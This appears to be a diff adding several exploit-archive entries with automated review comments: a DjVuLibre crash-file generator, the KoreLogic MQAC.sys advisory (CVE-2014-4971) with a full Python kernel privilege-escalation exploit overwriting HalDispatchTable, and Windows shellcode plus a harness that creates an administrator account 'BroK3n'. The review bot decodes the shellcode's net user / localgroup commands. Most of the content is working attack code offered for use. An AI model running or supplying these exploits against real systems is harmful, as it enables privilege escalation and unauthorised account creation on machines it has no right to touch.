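+/stopcasting
+/cast [target=mouseover,nomod,exists] Dispel Magic; [target=mouseover,exists,mod:ctrl] Abolish Disease; [target=mouseover,exists,mod:shift] Dispel Magic
+END
+MACRO 2 "PoC" INV_Misc_QuestionMark
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA x n+1 :-)
+END
+==============================================================================
+Greetz to My Friend : promoh3nv , AmirHosein Nemati , b3hz4d And Head Administrator of ST-Team [RadoN]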
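Review bot: The title and header call this a 'Stack Overflow', but the crash data describes stack exhaustion: exception 0xC00000FD (STACK_OVERFLOW) at `test dword ptr [eax],eax` with eax on a page that reads as zero looks like a stack-probe fault rather than an overwritten return address, so the report should classify it as a local denial of service and not imply memory corruption. The PoC also leaves the trigger as 'AAAA... x n+1 :-)', so the crash is not reproducible from the archive as written; stating the length actually used and, if known, whether the macro parser recurses on the body would give the vendor something to act on.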

122
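--- a/platforms/windows/dos/34135.py
+++ b/platforms/windows/dos/34135.py
@@ -0,0 +1,122 @@
+from shutil import copyfile
+import sys
+"""
+Exploit Title: DjVuLibre <= 3.5.25 Out of Bounds Access Violation
+Date: 07/14/24
+Exploit Author: drone (@dronesec)
+Vendor: http://djvu.sourceforge.net/
+Software link: http://downloads.sourceforge.net/djvu/djvulibre-3.5.25.3.tar.gz
+Version: <= 3.5.25.3
+Tested On: WinXP/Win7
+Patch: https://sourceforge.net/p/djvu/djvulibre-git/ci/7993b445f071a15248bd4be788a10643213cb9d2/
+The crash occurs due to a out of bounds read
+.text:004D3BC0 mov ecx, edx
+.text:004D3BC2 and ecx, 0Fh
+=> .text:004D3BC5 mov eax, [eax+ecx*4]
+.text:004D3BC8 test eax, eax
+.text:004D3BCA jnz short loc_
+We overwrite 4 bytes in an FG44 chunk header with \xff\xff\xff\xff:
+46 47
+34 34 00 00 04 6E 00 64 01 02 FF FF FF FF 80 FF <=
+F2 D9 81 5E 5C 51 12 AD 6B 27 14 29 F6 53 2B DD
+79 B0 01 E3 E2 71 33 58 CA 23 AE 25 35 E8 FF FF
+FF FF F5 BA 7A FA 45 39 C7 CD E0 76 93 FF FF FF
+FF FF F4 F1 85 98 84 DF 58 71 FE 2A 5F FF B7 16
+31 67 4E 93 F0 2D 20 D5 58 22 39 02 26 7E A6 03
+The crash occurs during image parsing:
+// Allocate reconstruction buffer
+short *data16;
+GPBuffer<short> gdata16(data16,bw*bh);
+// Copy coefficients
+int i;
+short *p = data16;
+const IW44Image::Block *block = blocks;
+for (i=0; i<bh; i+=32)
+{
+for (int j=0; j<bw; j+=32)
+{
+short liftblock[1024];
+// transfer into IW44Image::Block (apply zigzag and scaling)
+block->write_liftblock(liftblock);
+[...]
+void
+IW44Image::Block::write_liftblock(short *coeff, int bmin, int bmax) const
+{
+int n = bmin<<4;
+memset(coeff, 0, 1024*sizeof(short));
+for (int n1=bmin; n1<bmax; n1++)
+{
+const short *d = data(n1);
+[....]
+inline const short*
+IW44Image::Block::data(int n) const
+{
+if (! pdata[n>>4])
+return 0;
+return pdata[n>>4][n&15];
+}
+Which lines up quite nicely with our inlined disassembly of the function:
+.text:004D3BB0 loc_4D3BB0:
+.text:004D3BB0 mov ecx, [esp+0Ch+arg_0]
+.text:004D3BB4 mov eax, edx
+.text:004D3BB6 sar eax, 4 ; [n>>4]
+.text:004D3BB9 mov eax, [ecx+eax*4] ; our pdata[n] data after the bitwise shift, lets call it n2
+.text:004D3BBC test eax, eax ; if(n2 == 0)
+.text:004D3BBE jz short loc_4 ; return 0
+.text:004D3BC0 mov ecx, edx
+.text:004D3BC2 and ecx, 0Fh ; apply n & 15, or pdata[n2][n&15], lets call it n3
+=> .text:004D3BC5 mov eax, [eax+ecx*4] ; dereference pdata[n2][n3] into d
+.text:004D3BC8 test eax, eax ; test if d == 0
+.text:004D3BCA jnz short loc_
+n2 refs to a location on the heap; may be exploitable if we stack Fg44 chunks with valid headers and malformed content, so the chunk
+is allocated, then free'd, and hopefully our pointer dips into one of those free'd chunks. The returned short pointer is then used as the source in a
+memcpy with a controllable destination; write-what-where. Who knows.
+Tested with SumatraPDF 2.5.2 and WinDjView 2.0.2
+"""
+if len(sys.argv) < 2:
+print '[%s] <djvu file>' % sys.argv[0]
+sys.exit(1)
+bfile = sys.argv[1]
+# read in the data for parsing
+base_data = None
+with open(bfile, "rb") as f:
+base_data = f.read()
+# find a valid chunk
+chunk_idx = base_data.find("\x46\x47\x34\x34")
+if chunk_idx == -1:
+print '[-] No valid FG44 chunks found'
+sys.exit(1)
+copyfile(bfile, "./%s-dos.djvu" % bfile)
+print '[!] Found FG44 chunk at offset %d' % chunk_idx
+# overwrite
+with open("./%s-dos.djvu" % bfile, "r+b") as base:
+# skip over 4 byte indicator (FG44)
+# 2 byte primary header
+# 2 byte secondary header
+# 4 byte tertiary header
+base.seek(chunk_idx+12)
+base.write("\xff\xff\xff\xff")
+print '[!] %s-dos.djvu generated' % bfile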
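Review bot: `Date: 07/14/24` in the header is almost certainly a typo for 2014, given the July 2014 dates on the neighbouring entries, and should be written unambiguously, e.g. `Date: 2014-07-14`. The analysis correctly ties the fault to the `pdata[n>>4][n&15]` dereference in `IW44Image::Block::data` and links the upstream fix, but the closing 'write-what-where ... Who knows' paragraph is speculation the trace does not support, which only shows an out-of-bounds read; marking it explicitly as unverified keeps the entry from being triaged as more than a crash. A `Fixed in:` line naming the first release that contains commit 7993b445f071a15248bd4be788a10643213cb9d2 would also help readers checking the viewers they have deployed.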

206
platforms/windows/local/34112.txt Executable file

@ -0,0 +1,206 @@
Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-003
Publication Date: 2014.07.18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt
1. Vulnerability Details
Affected Vendor: Microsoft
Affected Product: MQ Access Control
Affected Versions: 5.1.0.1110
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where Condition
Impact: Privilege Escalation
Attack vector: IOCTL
CVE ID: CVE-2014-4971
2. Vulnerability Description
A vulnerability within the MQAC module allows an attacker to
inject memory they control into an arbitrary location they
define. This can be used by an attacker to overwrite
HalDispatchTable+0x4 and execute arbitrary code by subsequently
calling NtQueryIntervalProfile.
3. Technical Description
A userland process can create a handle into the MQAC device and
subsequently make DeviceIoControlFile() calls into that device.
During the IRP handler routine for 0x1965020f the user provided
OutputBuffer address is not validated. This allows an attacker
to specify an arbitrary address and write (or overwrite) the
memory residing at the specified address. This is classically
known as a write-what-where vulnerability and has well known
exploitation methods associated with it.
A stack trace from our fuzzing can be seen below. In our
fuzzing testcase, the specified OutputBuffer in the
DeviceIoControlFile() call is 0xffff0000.
STACK_TEXT:
b1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7
b1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d
b1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d
b1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31
b1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70
b1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7
b1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'
command shows the fault originating in the mqac driver.
OLLOWUP_IP:
mqac!AC2QM+5d
b230af37 891e mov dword ptr [esi],ebx
Reviewing the TRAP_FRAME at the time of crash we can see
IopCompleteRequest() copying data from InputBuffer into the
OutputBuffer. InputBuffer is another parameter provided to the
DeviceIoControlFile() function and is therefore controllable by
the attacker. The edi register contains the invalid address
provided during the fuzz testcase.
TRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)
ErrCode = 00000002
eax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000
eip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
mqac!AC2QM+0x5d:
b230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????
A write-what-where vulnerability can be leveraged to obtain
escalated privileges. To do so, an attacker will need to
allocate memory in userland that is populated with shellcode
designed to find the Token for PID 4 (System) and then overwrite
the token for its own process. By leveraging the vulnerability
in MQAC it is then possible to overwrite the pointer at
HalDispatchTable+0x4 with a pointer to our shellcode. Calling
NtQueryIntervalProfile() will subsequently call
HalDispatchTable+0x4, execute our shellcode, and elevate the
privilege of the exploit process.
4. Mitigation and Remediation Recommendation
None. A patch is not likely to be forthcoming from the vendor.
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft acknowledges receipt of vulnerability
report; states XP is no longer supported and asks if
the vulnerability affects other versions of Windows.
2014.04.29 - KoreLogic asks Microsoft for clarification of their
support policy for XP.
2014.04.29 - Microsoft says XP-only vulnerabilities will not be
addressed with patches.
2014.04.29 - KoreLogic asks if Microsoft intends to address the
vulnerability report.
2014.04.29 - Microsoft opens case to investigate the impact of the
vulnerability on non-XP systems.
2014.05.06 - Microsoft asks again if this vulnerability affects
non-XP systems.
2014.05.14 - KoreLogic informs Microsoft that the vulnerability
report is for XP and other Windows versions have
not been examined.
2014.06.11 - KoreLogic informs Microsoft that 30 business days
have passed since vendor acknowledgement of the
initial report. KoreLogic requests CVE number for the
vulnerability, if there is one. KoreLogic also
requests vendor's public identifier for the
vulnerability along with the expected disclosure date.
2014.06.11 - Microsoft responds to KoreLogic that the
vulnerability does not affect an "up-platform"
product. Says they are investigating embedded
platforms. Does not provide a CVE number or a
disclosure date.
2014.06.30 - KoreLogic asks Microsoft for confirmation of their
receipt of the updated PoC. Also requests that
a CVE ID be issued to this vulnerability.
2014.07.02 - 45 business days have elapsed since Microsoft
acknowledged receipt of the vulnerability report and
PoC.
2014.07.07 - KoreLogic requests CVE from MITRE.
2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to
be identical to KL-001-2014-002 and issues
CVE-2014-4971 for both vulnerabilities.
2014.07.18 - Public disclosure.
7. Proof of Concept
#!/usr/bin/python2
#
# KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
# Matt Bergin (KoreLogic / Smash the Stack)
# CVE-2014-4971
#
from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit
EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0
# thanks to offsec for the concept
# I re-wrote the code as to not fully insult them :)
def getBase(name=None):
retArray = c_ulong*1024
ImageBase = retArray()
callback = c_int(1024)
cbNeeded = c_long()
EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
for base in ImageBase:
driverName = c_char_p("\x00"*1024)
GetDeviceDriverBaseNameA(base,driverName,48)
if (name):
if (driverName.value.lower() == name):
return base
else:
return (base,driverName.value)
return None
handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
print "[+] Handle \\\\.\\MQAC @ %s" % (handle)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
buf = "\x50\x00\x00\x00"+"\x90"*0x400
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0)))
#Overwrite Pointer
kBase,kVer = getBase()
hKernel = LoadLibraryExA(kVer,0,1)
HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += kBase
HalDispatchTable += 0x4
print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)
print "[+] HalDispatchTable+0x4 overwritten"
CloseHandle(handle)
NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
exit(0)
The contents of this advisory are copyright(c) 2014
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt


@ -0,0 +1,27 @@
Add Admin User Shellcode (194 bytes) - Any Windows Version
========================================================
Title: Add Admin User Shellcode (194 bytes) - Any Windows Version
Release date: 21/06/2014
Author: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
Size: 194 byte (NULL free)
Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3
Username: BroK3n
Password: BroK3n
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"
"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"
"\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"
"\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"
"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"
"\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
"\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"
"\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"
"\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"
"\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";
int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();}
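Review bot: The "Any Windows Version" claim in the title and the "Tested on" line never state the architecture, yet the stub is 32-bit x86 (`xor edx,edx; mov dl,0x30; mov edx,fs:[edx]` walks the PEB through FS, then scans the loaded-module list for a name whose 13th byte is '3' and the export table for "WinE"), so it only runs inside a 32-bit process; a line such as `Arch: x86 (32-bit only); resolves WinExec from kernel32 via the PEB` belongs in the header. The file also never documents the command it runs: the pushed dwords spell out `cmd.exe /c net user BroK3n BroK3n /ADD & net localgroup Administrators BroK3n /ADD`, with the trailing `\x01` decremented to a NUL at runtime (`fe 4d 53`); stating that once in the header tells a reader which process-creation events the payload produces, which is what matters for anyone writing a detection from this listing. On the harness line, `int (*f)();` is an old-style non-prototype declaration and the `(int)` cast on the discarded call result is a no-op; `int (*f)(void) = (int (*)(void))shellcode; return f();` is the conventional form, and `argc`/`argv` are unused so `int main(void)` suffices. The hunk header announces 27 lines but only 23 are visible here, so a few blank lines may have been dropped in rendering.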